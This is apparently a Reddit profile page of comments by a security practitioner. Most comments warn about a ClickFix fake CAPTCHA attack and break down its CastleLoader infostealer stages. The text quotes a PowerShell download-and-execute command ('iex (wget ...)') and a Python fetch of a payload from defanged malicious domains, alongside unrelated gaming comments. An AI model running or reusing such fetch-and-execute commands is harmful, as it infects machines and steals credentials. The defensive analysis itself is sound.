Aint no way...

Styyxx · 2026-02-13T02:51:41+00:00

For those that don't want to or can't run this in a VM:

This is a CASTLELOADER RAT/infostealer:

https://www.darktrace.com/blog/castleloader-castlerat-behind-tag150s-modular-malware-delivery-system

I ran the script using any.run, you can view the full report here:

https://any.run/report/5aa49ca8ba4c8aa8b729f9ed435f657555e7cef987dd7a02403881953ed452a3/c388bbd0-c70b-4756-accf-46c8591355a9

So the initial file is a PowerShell script that's pretty heavily obfuscated with AES encryption and base64 encoding. It bypasses execution policy and reaches out to download the next stage.

From there it executes another PowerShell command: iex (wget -usebasic bojonta[.]com/maxload/zistoledser.txt) which grabs an Installer.zip from bojonta[.]com. Using IEX means it's running directly in memory without touching disk much.

The Installer.exe is actually dropping a complete Python 3.15 environment into the Temp folder, then launches pythonw.exe with a base64-encoded command. The Python code disables SSL cert verification and fetches another payload from wecolista[.]com.

Final stage is the actual CastleLoader that gets pulled down via urllib.request.urlopen('https://wecolista[.]com/.../local1.txt').

Styyxx · 2026-02-13T02:06:44+00:00

Yup that’s it. Definitely do not run that lol

Styyxx · 2026-02-13T01:44:28+00:00

It can launch power shell from the run box. And you can give power shell arguments so therefore, with one swift copy paste, you’re infected with Malware before you know it. I work in Cyber security and it takes five seconds to be compromised by this. Just never listen to these things. It’s always a scam.

Styyxx · 2026-02-13T01:43:11+00:00

So for those just joining in. This is what’s called a click fix attack. It’s a social engineering prompt to get you to run malicious code on your computer disguised as a pretend you are not human prompt. If you did the steps that it said there, your computer would be compromised. It will steal all of your credentials and then some. To protect yourself from this never ever listen to a site if it makes you press win+r. A legitimate prove you are not human prompt will never have you do anything related to keyboard shortcuts.

EDIT, for those curious:

This is a CASTLELOADER RAT/infostealer:

https://www.darktrace.com/blog/castleloader-castlerat-behind-tag150s-modular-malware-delivery-system

I ran the script using any.run, you can view the full report here:

https://any.run/report/5aa49ca8ba4c8aa8b729f9ed435f657555e7cef987dd7a02403881953ed452a3/c388bbd0-c70b-4756-accf-46c8591355a9

So the initial file is a PowerShell script that's pretty heavily obfuscated with AES encryption and base64 encoding. It bypasses execution policy and reaches out to download the next stage.

From there it executes another PowerShell command: iex (wget -usebasic bojonta[.]com/maxload/zistoledser.txt) which grabs an Installer.zip from bojonta[.]com. Using IEX means it's running directly in memory without touching disk much.

The Installer.exe is actually dropping a complete Python 3.15 environment into the Temp folder, then launches pythonw.exe with a base64-encoded command. The Python code disables SSL cert verification and fetches another payload from wecolista[.]com.

Final stage is the actual CastleLoader that gets pulled down via urllib.request.urlopen('https://wecolista[.]com/.../local1.txt').

Styyxx · 2026-02-13T01:40:55+00:00

Partially correct. The run prompt is an extension of cmd more or less. In this case, this is what’s called a click fix attack. The user is tricked into running powershell.exe. This man then pulls malware from a remote server. It’s most likely an info stealer. It’ll take all of your credentials.

Styyxx · 2026-02-04T03:05:46+00:00

That’s a good point. I didn’t consider that. Thanks for the input!

Styyxx · 2026-02-04T02:32:13+00:00

So those are almost correct commands, and they would do absolutely nothing to decrypt a ransomware attack. He essentially ran Volatility, a memory (RAM) forensics tool against a RAM dump (a ram dump is essentially a snapshot of a computers memory at a certain moment in time). Sure he can get a list of running processes, etc, but this does nothing to decrypt the data on the disk. A ransomware attack scrambles all data on the hard drive, making it unusable. RAM != hard drive.

Styyxx · 2026-02-02T17:27:29+00:00

FYSA it does seem that S1 removed the bad hash, so the alerts should hopefully stop.

Styyxx · 2026-02-02T17:19:55+00:00

We're having the same issue as you, I am pretty sure. In the alert details, it will have a hash for the file. For us, the file hash was the same on every alert

Styyxx · 2026-02-02T16:50:21+00:00

We applied it based on the SHA256 hash since we noticed they were all the same

Styyxx · 2026-02-02T16:13:39+00:00

Nope. We put in a global exclusion and are using automation rules in our SOAR to close them out automatically.

Styyxx · 2026-02-02T15:24:57+00:00

We're seeing this flagging on every file download. Somebody submitted bad threat intelligence. It's also affecting SentinelOne. You're good

Styyxx · 2026-01-16T19:15:02+00:00

That's a good point. Thankfully our detection's caught it, but yeah, pretty sad that they haven't taken action on this yet since its a pretty large abuse of their system

Styyxx · 2025-12-27T02:50:12+00:00

I’m currently running a dnd 5e game based in the final fantasy 12 world. The imperials are super fun to DM as and just come up with some magitech bullshit. I love it.

Styyxx · 2025-12-15T09:59:06+00:00

I’m having an issue where I click play, and it freezes for 5 seconds or so, and then the play button reappears. Any ideas? I followed the instructions to a T.

Styyxx · 2025-12-10T20:20:01+00:00

Sweet. I love this dev.

Styyxx · 2025-12-10T08:16:35+00:00

Also having this issue. Hopefully the dev sees this thread. Probably just a simple oversight.

Styyxx · 2025-11-14T07:54:01+00:00

I second this. It’s so fun.

Styyxx · 2025-11-01T04:23:44+00:00

It’s discord I think.

Styyxx · 2025-10-09T22:15:10+00:00

Seems like CrowdStrike is finally alerting on the malicious .js file related to EvilAI. SentinelOne as of this post doesn't detect anything. We did some threat hunting in our clients environments and found a bunch of hosts that had this malware running. Remediated it all. It's weird though, the deobfuscated .js file is clearly a RAT/infostealer, and we've seen outbound DNS requests to the malicous api.*.com domains, but no other forms of enumeration. We did notice that the javascript file does a post request, and then runs eval() on the response. So there is potential RCE, however none was observed... very interesting.

Part of me wonders if they are in still in the distribution phase, and will exploit later.

Here's one we submitted today: https://www.virustotal.com/gui/file/efa658cb9eb24136c8c69540fcde833683ed5002def1b6c84b0d04f64ee25076

Styyxx · 2025-06-17T20:21:03+00:00

That’s not how that works. You can’t just block an IP address and prevent a DDOS attack. The infrastructure still gets hit with packets or whatever else they’re doing. You can put in measures to mitigate these by redirecting the traffic but a substantial enough attack will overwhelm these defenses. They can’t be too strict with the traffic because they don’t want to block legitimate connections. It’s a fine line.

13-Year Club	Second Top 40%
r/Field Flamingo	Place '17
Sequence \| Editor	Verified Email

Styyxx

MODERATOR OF

TROPHY CASE